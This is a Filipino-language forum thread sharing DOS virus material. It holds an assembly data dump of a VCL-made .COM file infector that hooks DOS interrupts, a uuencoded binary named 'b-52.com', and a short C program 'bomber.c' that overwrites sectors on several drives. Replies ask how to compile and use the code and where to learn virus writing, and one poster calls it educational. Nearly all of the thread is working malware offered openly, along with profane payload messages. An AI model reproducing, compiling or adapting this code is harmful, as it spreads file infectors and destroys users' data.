db 000h, 053h, 075h, 063h, 06Bh, 020h, 06Dh, 065h
db 021h, 00Dh, 00Ah, 024h, 002h, 043h, 06Fh, 063h
db 06Bh, 073h, 075h, 063h, 06Bh, 065h, 072h, 020h
db 041h, 074h, 020h, 04Bh, 065h, 079h, 062h, 06Fh
db 061h, 072h, 064h, 020h, 065h, 072h, 072h, 06Fh
db 072h, 020h, 072h, 065h, 061h, 064h, 069h, 06Eh
db 067h, 020h, 064h, 065h, 076h, 069h, 063h, 065h
db 020h, 043h, 04Fh, 04Eh, 03Ah, 024h, 000h, 007h
db 00Dh, 00Dh, 00Dh, 007h, 00Dh, 00Dh, 00Dh, 007h
db 00Dh, 00Dh, 00Dh, 00Ah, 049h, 027h, 06Dh, 020h
db 073h, 06Fh, 072h, 072h, 079h, 02Ch, 020h, 062h
db 075h, 074h, 020h, 079h, 06Fh, 075h, 072h, 020h
db 063h, 061h, 06Ch, 06Ch, 020h, 063h, 061h, 06Eh
db 06Eh, 06Fh, 074h, 020h, 062h, 065h, 020h, 063h
db 06Fh, 06Dh, 070h, 06Ch, 065h, 074h, 065h, 064h
db 020h, 061h, 073h, 020h, 064h, 069h, 061h, 06Ch
db 065h, 064h, 02Eh, 00Dh, 00Ah, 050h, 06Ch, 065h
db 061h, 073h, 065h, 020h, 068h, 061h, 06Eh, 067h
db 020h, 075h, 070h, 020h, 026h, 020h, 074h, 072h
db 079h, 020h, 079h, 06Fh, 075h, 072h, 020h, 063h
db 061h, 06Ch, 06Ch, 020h, 061h, 067h, 061h, 069h
db 06Eh, 02Eh, 00Dh, 00Ah, 024h, 000h, 04Eh, 06Fh
db 021h, 00Dh, 00Ah, 00Dh, 00Ah, 024h, 001h, 050h
db 061h, 06Eh, 069h, 063h, 020h, 06Bh, 065h, 072h
db 06Eh, 061h, 06Ch, 020h, 06Dh, 06Fh, 064h, 065h
db 020h, 069h, 06Eh, 074h, 065h, 072h, 072h, 075h
db 070h, 074h, 024h, 005h, 043h, 04Fh, 04Eh, 04Eh
db 045h, 043h, 054h, 020h, 031h, 032h, 030h, 030h
db 0ABh, 00Dh, 00Ah, 00Dh, 00Ah, 024h, 003h, 04Fh
db 06Bh, 061h, 079h, 02Ch, 020h, 06Fh, 06Bh, 061h
db 079h, 021h, 020h, 020h, 042h, 065h, 020h, 070h
db 061h, 074h, 069h, 065h, 06Eh, 074h, 021h, 020h
db 02Eh, 02Eh, 02Eh, 00Dh, 00Ah, 024h, 000h, 041h
db 06Eh, 064h, 020h, 069h, 066h, 020h, 049h, 020h
db 072h, 065h, 066h, 075h, 073h, 065h, 03Fh, 00Dh
db 00Ah, 024h, 003h, 046h, 075h, 063h, 06Bh, 020h
db 074h, 068h, 065h, 020h, 077h, 06Fh, 072h, 06Ch
db 064h, 020h, 061h, 06Eh, 064h, 020h, 069h, 074h
db 073h, 020h, 066h, 06Fh, 06Ch, 06Ch, 06Fh, 077h
db 065h, 072h, 073h, 021h, 00Dh, 00Ah, 024h, 003h
db 059h, 06Fh, 075h, 020h, 061h, 072h, 065h, 020h
db 070h, 061h, 074h, 068h, 065h, 074h, 069h, 063h
db 02Ch, 020h, 06Dh, 061h, 06Eh, 02Eh, 02Eh, 02Eh
db 020h, 079h, 06Fh, 075h, 020h, 06Bh, 06Eh, 06Fh
db 077h, 020h, 074h, 068h, 061h, 074h, 03Fh, 00Dh
db 00Ah, 024h, 000h, 043h, 075h, 06Dh, 020h, 06Fh
db 06Eh, 021h, 020h, 020h, 054h, 061h, 06Ch, 06Bh
db 020h, 044h, 049h, 052h, 054h, 059h, 020h, 074h
db 06Fh, 020h, 06Dh, 065h, 020h, 021h, 021h, 021h
db 00Dh, 00Ah, 024h, 000h, 059h, 06Fh, 075h, 072h
db 020h, 063h, 06Fh, 070h, 072h, 06Fh, 063h, 065h
db 073h, 073h, 06Fh, 072h, 020h, 077h, 065h, 061h
db 072h, 073h, 020h, 066h, 06Ch, 06Fh, 070h, 070h
db 079h, 020h, 064h, 069h, 073h, 06Bh, 073h, 021h
db 00Dh, 00Ah, 024h, 006h, 04Ah, 06Fh, 06Bh, 065h
db 072h, 021h, 020h, 076h, 065h, 072h, 020h, 0E0h
db 0E0h, 020h, 062h, 079h, 020h, 054h, 042h, 053h
db 049h, 021h, 00Dh, 00Ah, 052h, 065h, 06Dh, 065h
db 06Dh, 062h, 065h, 072h, 021h, 020h, 020h, 045h
db 056h, 045h, 052h, 059h, 054h, 048h, 049h, 04Eh
db 047h, 027h, 073h, 020h, 062h, 069h, 067h, 067h
db 065h, 072h, 020h, 069h, 06Eh, 020h, 054h, 065h
db 078h, 061h, 073h, 021h, 00Dh, 00Ah, 024h, 032h
db 0C0h, 0CFh, 02Ah, 02Eh, 043h, 04Fh, 04Dh, 000h
db 02Eh, 02Eh, 000h, 003h, 000h, 001h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h

data04 db "*.com",0


May continuation pa po ito

Continuation

data05 dw 2BEh
db 0E9h, 003h, 000h, 044h, 048h, 000h, 0E8h, 000h
db 000h, 0B4h, 02Ch, 0CDh, 021h, 08Ah, 0C5h, 098h
db 03Dh, 010h, 000h, 07Dh, 003h, 0E9h, 08Ah, 000h
db 0FAh, 0BAh, 002h, 000h, 0BDh, 040h, 000h, 0BEh
db 000h, 010h, 0BFh, 000h, 020h, 0B0h, 0B6h, 0E6h
db 043h, 08Bh, 0DEh, 08Bh, 0C3h, 0E6h, 042h, 08Ah
db 0C4h, 0E6h, 042h, 0E4h, 061h, 00Ch, 003h, 0E6h
db 061h, 0B9h, 0E0h, 02Eh, 0E2h, 0FEh, 087h, 0FEh
db 0E4h, 061h, 024h, 0FCh, 0E6h, 061h, 04Dh, 075h
db 0E0h, 0B8h, 010h, 000h, 0B9h, 060h, 0EAh, 0E2h
db 0FEh, 048h, 075h, 0F8h, 04Ah, 075h, 0C5h, 0FBh
db 0BEh, 000h, 000h, 0ACh, 08Ah, 0E0h, 0ACh, 024h
db 003h, 0B2h, 080h, 08Ah, 0F0h, 08Ah, 0ECh, 0B1h
db 001h, 0BBh, 0BDh, 003h, 0B8h, 001h, 002h, 0CDh
db 013h, 0EBh, 0E8h, 054h, 068h, 069h, 073h, 020h
db 070h, 072h, 06Fh, 067h, 072h, 061h, 06Dh, 020h
db 069h, 073h, 020h, 073h, 069h, 063h, 06Bh, 02Eh
db 020h, 05Bh, 050h, 052h, 04Fh, 054h, 04Fh, 02Dh
db 054h, 020h, 062h, 079h, 020h, 044h, 075h, 06Dh
db 062h, 063h, 06Fh, 02Ch, 020h, 049h, 04Eh, 043h
db 02Eh, 05Dh, 05Dh, 081h, 0EDh, 009h, 001h, 0BFh
db 000h, 001h, 08Dh, 0B6h, 0A6h, 003h, 0B9h, 006h
db 000h, 0F3h, 0A4h, 0B4h, 0A0h, 0CDh, 021h, 03Dh
db 001h, 000h, 074h, 05Bh, 08Ch, 0C8h, 048h, 08Eh
db 0D8h, 080h, 03Eh, 000h, 000h, 05Ah, 075h, 047h
db 0A1h, 003h, 000h, 02Dh, 050h, 000h, 0A3h, 003h
db 000h, 08Bh, 0D8h, 08Ch, 0C0h, 003h, 0C3h, 08Eh
db 0C0h, 0B9h, 0B7h, 002h, 08Ch, 0D8h, 040h, 08Eh
db 0D8h, 08Dh, 0B6h, 006h, 001h, 0BFh, 000h, 001h
db 0F3h, 0A4h, 03Eh, 08Ch, 086h, 0B1h, 003h, 08Ch
db 0C8h, 08Eh, 0C0h, 0FAh, 0B8h, 021h, 035h, 0CDh
db 021h, 03Eh, 08Eh, 09Eh, 0B1h, 003h, 089h, 01Eh
db 094h, 003h, 08Ch, 006h, 096h, 003h, 0BAh, 016h
db 002h, 0B8h, 021h, 025h, 0CDh, 021h, 0FBh, 08Ch
db 0C8h, 08Eh, 0D8h, 08Eh, 0C0h, 033h, 0C0h, 0BBh
db 000h, 001h, 0FFh, 0E3h, 09Ch, 080h, 0FCh, 0A0h
db 075h, 005h, 0B8h, 001h, 000h, 09Dh, 0CFh, 01Eh
db 006h, 057h, 056h, 050h, 053h, 051h, 052h, 080h
db 0FCh, 040h, 075h, 005h, 083h, 0FBh, 004h, 075h
db 000h, 080h, 0FCh, 005h, 075h, 000h, 03Dh, 000h
db 04Bh, 075h, 00Dh, 02Eh, 08Ch, 01Eh, 0A7h, 003h
db 02Eh, 089h, 016h, 0A9h, 003h, 0EBh, 00Fh, 090h
db 05Ah, 059h, 05Bh, 058h, 05Eh, 05Fh, 007h, 01Fh
db 09Dh, 02Eh, 0FFh, 02Eh, 094h, 003h, 0FCh, 08Bh
db 0FAh, 01Eh, 007h, 0B0h, 02Eh, 0F2h, 0AEh, 026h
db 081h, 03Dh, 043h, 04Fh, 075h, 0E2h, 026h, 083h
db 07Dh, 002h, 04Dh, 075h, 0DBh, 0E8h, 0ECh, 000h
db 0E8h, 005h, 001h, 02Eh, 08Eh, 01Eh, 0A7h, 003h
db 02Eh, 08Bh, 016h, 0A9h, 003h, 0B8h, 002h, 03Dh
db 0E8h, 083h, 000h, 072h, 054h, 00Eh, 01Fh, 0A3h
db 0AFh, 003h, 08Bh, 0D8h, 0E8h, 0BCh, 000h, 00Eh
db 01Fh, 08Bh, 01Eh, 0AFh, 003h, 0B4h, 03Fh, 0B9h
db 006h, 000h, 0BAh, 0A0h, 003h, 0E8h, 066h, 000h
db 0A0h, 0A3h, 003h, 08Ah, 026h, 0A4h, 003h, 03Bh
db 006h, 0B5h, 003h, 074h, 018h, 0B8h, 000h, 042h
db 0E8h, 045h, 000h, 0B8h, 002h, 042h, 0E8h, 03Fh
db 000h, 02Dh, 003h, 000h, 0A3h, 0ADh, 003h, 0E8h
db 04Bh, 000h, 0E8h, 072h, 000h, 00Eh, 01Fh, 08Bh
db 01Eh, 0AFh, 003h, 08Bh, 016h, 0B1h, 003h, 08Bh
db 00Eh, 0B3h, 003h, 0B8h, 001h, 057h, 0E8h, 02Dh
db 000h, 08Bh, 01Eh, 0AFh, 003h, 0B4h, 03Eh, 0E8h
db 024h, 000h, 02Eh, 08Bh, 016h, 09Ch, 003h, 02Eh
db 08Eh, 01Eh, 09Eh, 003h, 0B8h, 024h, 025h, 0E8h
db 014h, 000h, 0E9h, 053h, 0FFh, 0B0h, 003h, 0CFh
db 00Eh, 01Fh, 08Bh, 01Eh, 0AFh, 003h, 033h, 0C9h
db 033h, 0D2h, 0E8h, 001h, 000h, 0C3h, 09Ch, 02Eh
db 0FFh, 01Eh, 094h, 003h, 0C3h, 00Eh, 01Fh, 0B8h
db 000h, 042h, 0E8h, 0E3h, 0FFh, 0B4h, 040h, 0B9h
db 001h, 000h, 0BAh, 0A6h, 003h, 0E8h, 0E6h, 0FFh
db 0B4h, 040h, 0B9h, 002h, 000h, 0BAh, 0ADh, 003h
db 0E8h, 0DBh, 0FFh, 0B4h, 040h, 0B9h, 002h, 000h
db 0BAh, 0B5h, 003h, 0E8h, 0D0h, 0FFh, 0C3h, 00Eh
db 01Fh, 0B8h, 002h, 042h, 0E8h, 0B9h, 0FFh, 0B4h
db 040h, 0B9h, 0B7h, 002h, 0BAh, 000h, 001h, 0E8h
db 0BCh, 0FFh, 0C3h, 0B8h, 000h, 057h, 0E8h, 0B5h
db 0FFh, 00Eh, 01Fh, 089h, 016h, 0B1h, 003h, 089h
db 00Eh, 0B3h, 003h, 0C3h, 0B8h, 024h, 035h, 0E8h
db 0A4h, 0FFh, 02Eh, 089h, 01Eh, 09Ch, 003h, 02Eh
db 08Ch, 006h, 09Eh, 003h, 0BAh, 0F7h, 002h, 00Eh
db 01Fh, 0B8h, 024h, 025h, 0E8h, 08Fh, 0FFh, 0C3h
db 0B8h, 000h, 043h, 02Eh, 08Eh, 01Eh, 0A7h, 003h
db 02Eh, 08Bh, 016h, 0A9h, 003h, 0E8h, 07Eh, 0FFh
db 080h, 0E1h, 0FEh, 0B8h, 001h, 043h, 0E8h, 075h
db 0FFh, 0C3h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 090h, 0CDh
db 020h, 044h, 048h, 000h, 0E9h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 044h, 048h, 090h

vcl_marker: db "[vcl]",0

finish label near

code ends
end main
begin 775 b-52.com
MZ0``Z```78'M!@&-MOX"OP`!5Z6DB_V+[('L@`"T+\TA4[0:C5:`S2'H>0#H
M=@#H50(]!`!_"N@]`CT7`'4"ZP/K#)"-E6H#C;6=`^BU`>@E`CT.`'\*Z"4"
M/2@`?`+K`^L,D(V5F`:-M9X&Z)4!Z!T"/1X`?`KH'0(]`P!U`NL#ZPR0C947
M#8VU'0WH=0%:M!K-(8OE,\"+V(O(B]"+\(OXB^C#58OL@^Q`M$,..87_`G16QH7]`@$%X`Z)A0(#N`%#,\F-5![-(;@"/S2&`O?T"`<,`D,T@Z0``5[0OS2&+^[1.N2<`S2%R0+@!0S/)C54>
MS2&X`3V-51[-(9.T0(L,C50"S2&X`5>+31:+51C-(;0^S2&X`4,R[8I-%8U5
M'LTAM$_-(7/"ZQ2T/#/)S2&3M$"+#(U4`LTAM#[-(5_#8SI<9&]S7"HN8V]M
M`+0LS2&*Q9C#M"S-(8K!F,.T*LTABL:8P[0LS2&*QIC#M"K-(9C#:0+I``"_
M$@&Y&
MJ`1*5%I8!?8"@](`L0E0T^C3ROD3T%B`Y`&)EIP$B8::!`X'_[:L!+D:`.L:
MN0,`*\&-MI@$C;[X`:6DQD3]Z8E$_@4#`5!1,\GHC@"P`NA_`+1`C9:8!%G-
M(;@"0C/)F\Z2X`5>+CH($BY:$
M!,TAM#[-(;4`BHZ!!.@7`/Z.EP1U!%CIQ_WIZ?ZT/8V6B@3-(9/#N`%#C9:*
M!,TAPUM=M$"-E@,!N?8"S2%35;`#SRHN97AE`"HN8V]M`"XN`"HN97AE`$H&
MZP=ID)"0S2"0Z```78'M#`%0Z`(`ZR$^BH9&!XVV-0&Y#P8P!-+`1N+YP^CI
M_UG-(>CC_\-1Z_-8,__ZCM>\\`+[OI8`-HL<-HM,`HV6-P-MF4'4NM$M!JZ@`#-(3/_CL>^E@`NBUU,)HD<+HM-3B
M3`(.!SZ+AG(',]N+RXO1B_*+_KS^_[T``56+Z,,+VW0&M#[-(3/;M$]:4C/)
M,]O-(7,#Z:0`N`(]B];-(7+>B]BT/[D$`(V6!0'-(3Z`O@@!:73)/H"^!0%-
M=,&X`D(SR3/2S2&`_/AWLSZ)AG4'M$"Y!`"-E@4!S2$^BJ9&!_[$@-0`/HBF
M1@>T0+D^!HV6"0'H[/ZX`$(SR3/2S2$^BX9U!T`^B88&`3[&A@4!Z3[&A@@!
M:;1`N00`C98%`T.\TA<@6T3NDO_S/_CL>T*LTA@/H$=0F`_@=U!#/`
MZQZT+,TA"LEU(X#]!GT>`LV+P9@"QA+"@-0`"\!U`4"+T+D!`#/;M!G-(*;/^+UK0)S2&`_0!T
M*8#]`73^@/T"="&`_0-T%(#]!'17@/T%=&V`_09T8(#]!W0#Z5;^Z/W_S2"-
MEJD#M`G-(;0!S2&-EMD#M`G-(3QA<@(L(#Q!=.`\4G4,C9;9`[0)S2&*\>N.
M/$ETQCQ&=N7#0I!8F]R="P@4F5T2$@($EN6]U(&YO="!T;R!T;W5C
M:"!T:&%T(20`4W5C:R!M92$-"B0"0V]C:W-U8VME6]U2!D:7-K2!40E-)(0T*4F5M96UB97(A("!%5D52651(24Y')W,@8FEG
M9V5R(&EN(%1E>&%S(0T*)#+`SRHN0T]-`"XN``,``0``````````````````
M```````````````````````````````````````````````J+ F-O;0"^`ND#
M`$1(`.@``+0LS2&*Q9@]$`!]`^F*`/JZ`@"]0`"^`!"_`""PMN9#B]Z+P^9"
MBL3F0N1A#`/F8;G@+N+^A_[D823\YF%-=>"X$`"Y8.KB_DAU^$IUQ?N^``"L
MBN"L)`.R@(KPBNRQ`;N]`[@!`LT3Z^A4:&ES('!R;V=R86T@:7,@!E=64%-14H#\0'4%@_L$=0"`_`5U
M`#T`2W4-+HP>IP,NB1:I`^L/D%I96UA>7PP+O*N)H$]
M0T]UXB:#?0)-==OH[`#H!0$NCAZG`RZ+%JD#N`(]Z(,`E`/##A^X`$+HX_^T
M0+D!`+JF`^CF_[1`N0(`NJT#Z-O_M$"Y`@"ZM0/HT/_##A^X`D+HN?^T0+FW
M`KH``>B\_\.X`%?HM?\.'XD6L0.)#K,#P[@D->BD_RZ)'IP#+HP&G@.Z]P(.
M'[@D)>B/_\.X`$,NCAZG`RZ+%JD#Z'[_@.'^N`%#Z'7_PP``````````````
?`)#-($1(`.D``````````````````$1(D%MV8VQ=````
`


THE END

Virus Source Code Database :: bomber.c

#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}



pno gamitin to??? paste sa txt file? then save s .vbs extension?

para sa mga virus professionals lang po ito, hnd po ito bsta copy paste lng ngnotepad...hnd gani2 ang mga yun, mga 1st class viruses ang mga ito...

tsaka kung gagawa k ng virus gamit ang mga ito, dpat may virus vault kayo gaya ng mga ginagamit namin,..pra hnd kayo mahawaan

Sir Flamingatom,anong Compiler Gamit Mo?

@ symbianize peeps:

suggestion lang baka pwede iattach niyo na lang yung text file
tapos post na lang kayo ng preview code para hindi masyadong
mahaba yung post dito sa board..

just my 2 cents. . ;)

boss san po ung virus vault

para sa mga virus professionals lang po ito, hnd po ito bsta copy paste lng ngnotepad...hnd gani2 ang mga yun, mga 1st class viruses ang mga ito...

two questions lang sir. are you a virus professional? and lastly do you understand these codes from head to foot?:beat:

oi bawal dapat 2 coutious tong thread baka makita ng mgabata pagtripan ung mga shop ayus lng kung tayong mga teen

meron ba ung talking virus

Sori ahH. . peRo waLA kasi aqng aLam na compiLEr ehH. .
baTa pLang kAsi aq. . heHe!
saN po aq maKakadownLoad ng cOmpiler?. .

ang alam ko poh na complier ng assembly language eh ung tasm.exe at tlink.exe may nakita poh aku nun sa win98. ewan ko po sa win2000 at xp.

sa mga nakakaalam... :noidea: please correct me if i'm wrong. thanks

boss san po ung virus vault

kramihan ng AV ay my virus vault na features like AVG

wala na ba kayong matin-tindi dyan?? may alam ba kayong website kung paano gumawa ng virus

wala na ba kayong matin-tindi dyan?? may alam ba kayong website kung paano gumawa ng virus

sorry for the term, but i think you don't get the point here. pinublish nila yan dito para magkaron tayo ng idea how these things work; not how to compile these things or create similar variants and wreck havoc.

hey thanks sa mga nag post ng source code . now i know paano structure ng virus.:thumbsup::clap:

gawa kayo ng virus ung sumisipon ung computer ung amaatsing:lol:

hayss ano ung i love you virus hindi ko pa na encounter yan ung taga lipa are pati ung meron pa nga ung tagalog "mamatay na mga taga lipa" :rofl: